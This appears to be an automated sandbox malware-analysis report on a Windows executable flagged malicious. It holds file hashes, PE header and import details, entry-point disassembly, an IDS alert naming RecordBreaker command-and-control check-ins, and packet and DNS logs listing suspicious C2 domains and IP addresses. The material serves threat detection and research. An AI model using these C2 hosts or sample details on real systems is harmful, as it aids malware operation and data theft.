                                                            SHA-256:B9C3B121EC97DDDA74CBC305280E8157021572B6B6FD59C3B066D0B0F5E54B18
                                                            SHA-512:B619FB507CAC5F4825316BECCB9BB0476B62570458E4EFC5731B804CB9F7187A16F9535F23587E0B662BF6A906D61B1B0E2939F742F0B4BD1797166F535E9287
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)./.H.|.H.|.H.|..+|.H.|..(|.H.|..>|.H.|...|.H.|.H.|.H.|..9|.H.|..)|.H.|..,|.H.|Rich.H.|................PE..L...^.@a.................r...........4............@.........................................................................dq..P.... .............................. ...............................`...@............................................text...xq.......r.................. ..`.data............*...v..............@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):248375
                                                            Entropy (8bit):7.999196600711684
                                                            Encrypted:true
                                                            SSDEEP:6144:m+2hPGPD/lBV9l3NoeDKDUJbJqravgQl/Ppx:X2hP+b/V9E1EqravgY/
                                                            MD5:B2BA8409237E7DBEA2E2BC08D6FF00E6
                                                            SHA1:4F1C02B99E259A54C21DC86F787441BAEC2EC47E
                                                            SHA-256:33C58A11F74C94FCB4A4EF68B29C8B2AE4541DCD3D824A54C5AC8EDD2F75F1FC
                                                            SHA-512:4C7F5C3832DC26202857BB23B33B6C81F1A3518CC9E1DD382A1892A0C2DE6C33DC5C5FF509F8A96E69ECA35C692F5108725CC7534FEA8A17F95868E98DE1E414
                                                            Malicious:false
                                                            Preview:-..Ay.Di0:m...C.3.x.&D.Z...-.?.zn...Rd+..#3.>.....d..qU..=..-.~..w....R.:...Q`@...\.E..D.N-`.,.<qK..6...=.G.........9.l9!.]o...`WN{.r.....mn(..;..r...@.m.K".......^.2.Q.....~>...iP5:....?.....a]o..[...o]i..J*.K^...F.`.wp2v.;.'O.)...bt..N...T$....9..j^}~..%.5...hY+@.c;+NrR:uU....rp..Zz.x..f.(...9......"......?D.X`.>wqr..-.>DQ.e..f.5U...l....{s).3.pP?1.4....}A.[...[..CF..S...<.....GuD.E.`.O......X.,.\r.,.......%.b..........t.[/,........-2.J.....s.>...K./gBs.?...-.f.....3"}...\.*Z.eD.h...0.Y..v.K....H..O...1...GO7...E.>..l...N..*.......L.Z.ri.4.....H...TO.S....'msv......g'n.....j..e.ny....z..S.l..m..e.......x.xih..x...A.s".D.._ ....$..6..j>.0b_{...m.u|..6t..w.._TE..&.y.._t..9B.....c..G(.3...\.`.X...D._....=.Sb&Do....)b..r<.. .E.i...n...^..Am..z.......o....U.4y..Iwp.=...v'..K....Z#.U....2<....y..w._.q.~.|.t..K......-q.s.R..iK.aG.P.tL..]..#..he.B6...d.hS.....j..X.5L...F.9c..&6ip..7-M...\|9&..%.v..%n.HT!.;...A....m..P;.$).L.8.Y..
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):253952
                                                            Entropy (8bit):7.039129263894516
                                                            Encrypted:false
                                                            SSDEEP:6144:m8dYQFv8Aj+VVettSsDgiSZCAGrwVfxz:mPQx9j2engiDAGo
                                                            MD5:203EAECA3C89F5CA7DC82668C4883B5A
                                                            SHA1:0D872229972EC1E3EA8173343A715B4A2FCB5855
                                                            SHA-256:C4624241F0890DADA47236F267303691F82BBBD28EED1A379A498BD3009CB734
                                                            SHA-512:CB4327F27212B1551F5AA5BE48CB83E46C54216AE29787E3B47E4C7E41C581DC12FC03E56827B6DC90C8E35EF2079E474749A82951146441161A4DDC913247DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................<...............R.....=...................Rich...................PE..L...^..`.................8...^.......`.......P....@..........................0......s........................................<..<........{..........................................................h5..@............................................text....6.......8.................. ..`.data....Z...P...(...<..............@....rsrc....{.......|...d..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.039129263894516
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:5tLwjRFzAW.exe
                                                            File size:253952
                                                            MD5:203eaeca3c89f5ca7dc82668c4883b5a
                                                            SHA1:0d872229972ec1e3ea8173343a715b4a2fcb5855
                                                            SHA256:c4624241f0890dada47236f267303691f82bbbd28eed1a379a498bd3009cb734
                                                            SHA512:cb4327f27212b1551f5aa5be48cb83e46c54216ae29787e3b47e4c7e41c581dc12fc03e56827b6dc90c8e35ef2079e474749a82951146441161a4ddc913247de
                                                            SSDEEP:6144:m8dYQFv8Aj+VVettSsDgiSZCAGrwVfxz:mPQx9j2engiDAGo
                                                            TLSH:1E44BF2072D1C871E166267888268FE15F7EBD12EA74858B37E4271E6E733C05A7631F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................<.................R.....=.....................Rich....................PE..L...^..`.................8.
                                                            Icon Hash:8a909989ca8ed2f2
                                                            Entrypoint:0x4060b7
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x60CAA95E [Thu Jun 17 01:46:06 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:17d894006bd909847ec5f7cd1793aa2b
                                                            Instruction
                                                            call 00007F05085770B8h
                                                            jmp 00007F05085714EEh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            call 00007F050857169Ch
                                                            xchg cl, ch
                                                            jmp 00007F0508571684h
                                                            call 00007F0508571693h
                                                            fxch st(0), st(1)
                                                            jmp 00007F050857167Bh
                                                            fabs
                                                            fld1
                                                            mov ch, cl
                                                            xor cl, cl
                                                            jmp 00007F0508571671h
                                                            mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                            fabs
                                                            fxch st(0), st(1)
                                                            fabs
                                                            fxch st(0), st(1)
                                                            fpatan
                                                            or cl, cl
                                                            je 00007F0508571666h
                                                            fldpi
                                                            fsubrp st(1), st(0)
                                                            or ch, ch
                                                            je 00007F0508571664h
                                                            fchs
                                                            ret
                                                            fabs
                                                            fld st(0), st(0)
                                                            fld st(0), st(0)
                                                            fld1
                                                            fsubrp st(1), st(0)
                                                            fxch st(0), st(1)
                                                            fld1
                                                            faddp st(1), st(0)
                                                            fmulp st(1), st(0)
                                                            ftst
                                                            wait
                                                            fstsw word ptr [ebp-000000A0h]
                                                            wait
                                                            test byte ptr [ebp-0000009Fh], 00000001h
                                                            jne 00007F0508571667h
                                                            xor ch, ch
                                                            fsqrt
                                                            ret
                                                            pop eax
                                                            jmp 00007F050857727Fh
                                                            fstp st(0)
                                                            fld tbyte ptr [0040236Ah]
                                                            ret
                                                            fstp st(0)
                                                            or cl, cl
                                                            je 00007F050857166Dh
                                                            fstp st(0)
                                                            fldpi
                                                            or ch, ch
                                                            je 00007F0508571664h
                                                            fchs
                                                            ret
                                                            fstp st(0)
                                                            fldz
                                                            or ch, ch
                                                            je 00007F0508571659h
                                                            fchs
                                                            ret
                                                            fstp st(0)
                                                            jmp 00007F0508577255h
                                                            fstp st(0)
                                                            mov cl, ch
                                                            jmp 00007F0508571662h
                                                            call 00007F050857162Eh
                                                            jmp 00007F0508577260h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            Programming Language:
                                                            • [ASM] VS2010 build 30319
                                                            • [ C ] VS2010 build 30319
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [C++] VS2010 build 30319
                                                            • [RES] VS2010 build 30319
                                                            • [LNK] VS2010 build 30319
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13ca40x3c.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x20ab0000x17b80.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12000x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35680x40.text
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b0.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x136880x13800False0.5780498798076923data6.592073295679556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data0x150000x2095a100x12800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x20ab0000x17b800x17c00False0.6452097039473684data6.622093198418492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountry
                                                            KUNADOREHUMENANAMOVIZO0x20be7100x2626ASCII text, with very long lines, with no line terminatorsFrenchSwitzerland
                                                            SENUZEMIX0x20be0d80x636ASCII text, with very long lines, with no line terminatorsFrenchSwitzerland
                                                            RT_CURSOR0x20c0d380x330dBase III DBT, version number 0, next free block index 40, 1st item "\377\217\377\377\376?"FrenchSwitzerland
                                                            RT_CURSOR0x20c10680x130dataFrenchSwitzerland
                                                            RT_CURSOR0x20c11c00x130dataFrenchSwitzerland
                                                            RT_CURSOR0x20c12f00xb0GLS_BINARY_LSB_FIRSTFrenchSwitzerland
                                                            RT_ICON0x20ab8a00xea8dataKannadaKanada
                                                            RT_ICON0x20ac7480x8a8dataKannadaKanada
                                                            RT_ICON0x20acff00x568GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_ICON0x20ad5580x25a8dataKannadaKanada
                                                            RT_ICON0x20afb000x10a8dataKannadaKanada
                                                            RT_ICON0x20b0ba80x988dataKannadaKanada
                                                            RT_ICON0x20b15300x468GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_ICON0x20b1a000xea8dataKannadaKanada
                                                            RT_ICON0x20b28a80x8a8dataKannadaKanada
                                                            RT_ICON0x20b31500x6c8dataKannadaKanada
                                                            RT_ICON0x20b38180x568GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_ICON0x20b3d800x25a8dataKannadaKanada
                                                            RT_ICON0x20b63280x10a8dataKannadaKanada
                                                            RT_ICON0x20b73d00x468GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_ICON0x20b78a00xea8dataKannadaKanada
                                                            RT_ICON0x20b87480x8a8dataKannadaKanada
                                                            RT_ICON0x20b8ff00x6c8dataKannadaKanada
                                                            RT_ICON0x20b96b80x568GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_ICON0x20b9c200x25a8dataKannadaKanada
                                                            RT_ICON0x20bc1c80x10a8dataKannadaKanada
                                                            RT_ICON0x20bd2700x988dataKannadaKanada
                                                            RT_ICON0x20bdbf80x468GLS_BINARY_LSB_FIRSTKannadaKanada
                                                            RT_DIALOG0x20c15600xacdataFrenchSwitzerland
                                                            RT_STRING0x20c16100x4aedataFrenchSwitzerland
                                                            RT_STRING0x20c1ac00x770dataFrenchSwitzerland
                                                            RT_STRING0x20c22300x464dataFrenchSwitzerland
                                                            RT_STRING0x20c26980x4e8dataFrenchSwitzerland
                                                            RT_GROUP_CURSOR0x20c11980x22dataFrenchSwitzerland
                                                            RT_GROUP_CURSOR0x20c13a00x22dataFrenchSwitzerland
                                                            RT_GROUP_ICON0x20b19980x68dataKannadaKanada
                                                            RT_GROUP_ICON0x20b78380x68dataKannadaKanada
                                                            RT_GROUP_ICON0x20be0600x76dataKannadaKanada
                                                            RT_VERSION0x20c13c80x194dataFrenchSwitzerland
                                                            DLLImport
                                                            KERNEL32.dllGetModuleFileNameA, FoldStringA, InterlockedDecrement, _hread, CancelWaitableTimer, WaitNamedPipeW, BuildCommDCBW, GetConsoleAliasExesLengthW, PeekConsoleInputA, CreateFileA, RegisterWaitForSingleObjectEx, LoadLibraryW, EnumResourceTypesA, TransmitCommChar, GetFirmwareEnvironmentVariableW, BeginUpdateResourceA, WriteConsoleW, DeleteFileA, GetProcAddress, GetUserDefaultLCID, GetConsoleAliasW, FindFirstChangeNotificationA, RemoveDirectoryA, GetCalendarInfoW, FindFirstFileExW, AreFileApisANSI, GetCurrentDirectoryW, GetConsoleAliasesLengthW, SetConsoleTitleW, GetBinaryTypeW, GlobalAlloc, FindNextFileA, OpenJobObjectA, HeapFree, _lclose, GetComputerNameA, TlsSetValue, SetCalendarInfoW, SetComputerNameA, LoadLibraryA, FoldStringW, GetDiskFreeSpaceW, GetSystemDefaultLangID, SetThreadLocale, FillConsoleOutputCharacterA, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, IsProcessorFeaturePresent, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DecodePointer, TerminateProcess, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsFree, InterlockedIncrement, GetModuleHandleW, SetLastError, GetCurrentThreadId, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, WideCharToMultiByte, RaiseException, SetFilePointer, GetConsoleCP, GetConsoleMode, LCMapStringW, GetStringTypeW, SetStdHandle, FlushFileBuffers, HeapAlloc, HeapReAlloc, SetEndOfFile, GetProcessHeap, ReadFile, HeapSize, CreateFileW
                                                            GDI32.dllGetCharWidth32A
                                                            Language of compilation systemCountry where language is spokenMap
                                                            FrenchSwitzerland
                                                            KannadaKanada
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.345.138.74.10449759802036934 08/11/22-06:53:10.741012TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin4975980192.168.2.345.138.74.104
                                                            45.138.74.104192.168.2.380497592036955 08/11/22-06:53:11.296973TCP2036955ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response804975945.138.74.104192.168.2.3
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 11, 2022 06:52:49.869482994 CEST4974980192.168.2.3185.237.206.60
                                                            Aug 11, 2022 06:52:52.876912117 CEST4974980192.168.2.3185.237.206.60
                                                            Aug 11, 2022 06:52:58.249072075 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:58.559278011 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:58.559457064 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:58.559519053 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:58.563397884 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:58.873621941 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.618261099 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.618315935 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.618560076 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:59.929085016 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.929169893 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.929227114 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.929277897 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:52:59.929373980 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:52:59.929431915 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.239784956 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.239871025 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.239931107 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.239984989 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.240029097 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.240041971 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.240078926 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.240211964 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.240268946 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.240320921 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.240343094 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.241118908 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.550545931 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.550627947 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.550690889 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.550749063 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.550873995 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.551085949 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551150084 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.551281929 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551336050 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551398039 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.551417112 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551466942 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551525116 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.551565886 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551683903 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551763058 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.551889896 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551943064 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.551951885 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.552064896 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.552130938 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.552196026 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.643435001 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.861150980 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.861258030 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.861310959 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.861362934 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.861399889 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.861453056 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.861916065 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862095118 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862159967 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862207890 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.862343073 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862397909 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862451077 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862452984 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.862529039 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.862607002 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862668991 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862767935 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.862771034 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862894058 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862946987 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.862987041 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.863110065 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863204002 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.863240004 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863293886 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863387108 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.863434076 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863576889 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863673925 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.863730907 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863786936 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.863878965 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.863893986 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864056110 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864109039 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864151955 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.864267111 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864367008 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.864396095 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864577055 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.864677906 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:00.953901052 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.953969955 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:00.954103947 CEST4975480192.168.2.3110.14.121.125
                                                            Aug 11, 2022 06:53:01.172090054 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:01.173774004 CEST8049754110.14.121.125192.168.2.3
                                                            Aug 11, 2022 06:53:01.173830986 CEST8049754110.14.121.125192.168.2.3
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Aug 11, 2022 06:52:49.551544905 CEST192.168.2.38.8.8.80x5febStandard query (0)monsutiur4.comA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.559319973 CEST192.168.2.38.8.8.80x5feeStandard query (0)nusurionuy5ff.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.596689939 CEST192.168.2.38.8.8.80x41efStandard query (0)moroitomo4.netA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.714833975 CEST192.168.2.38.8.8.80x5dfdStandard query (0)susuerulianita1.netA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.830281019 CEST192.168.2.38.8.8.80x6188Standard query (0)cucumbetuturel4.comA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.861974001 CEST192.168.2.38.8.8.80x3f2fStandard query (0)nunuslushau.comA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:52:57.905580997 CEST192.168.2.38.8.8.80x819fStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:02.094981909 CEST192.168.2.38.8.8.80xb37fStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:03.147916079 CEST192.168.2.38.8.8.80x932eStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:08.751971006 CEST192.168.2.38.8.8.80x3b75Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:10.544703960 CEST192.168.2.38.8.8.80x3d48Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:12.043751001 CEST192.168.2.38.8.8.80xa4e0Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:13.185066938 CEST192.168.2.38.8.8.80x6fd5Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:42.550822020 CEST192.168.2.38.8.8.80xa62aStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:43.747505903 CEST192.168.2.38.8.8.80xd307Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:51.130366087 CEST192.168.2.38.8.8.80x31feStandard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:51.595168114 CEST192.168.2.38.8.8.80x229bStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:52.587106943 CEST192.168.2.38.8.8.80xa77Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:54.057549953 CEST192.168.2.38.8.8.80xb36bStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:57.645205021 CEST192.168.2.38.8.8.80x262dStandard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:53:58.699114084 CEST192.168.2.38.8.8.80x4260Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:04.095474005 CEST192.168.2.38.8.8.80xbfa3Standard query (0)linislominyt11.atA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:09.813925982 CEST192.168.2.38.8.8.80xde88Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:11.042941093 CEST192.168.2.38.8.8.80xbe35Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:11.247318983 CEST192.168.2.38.8.8.80x67b0Standard query (0)rgyui.topA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:11.247670889 CEST192.168.2.38.8.8.80x10c3Standard query (0)acacaca.orgA (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:11.538197994 CEST192.168.2.38.8.8.80xeb4dStandard query (0)api.2ip.uaA (IP address)IN (0x0001)
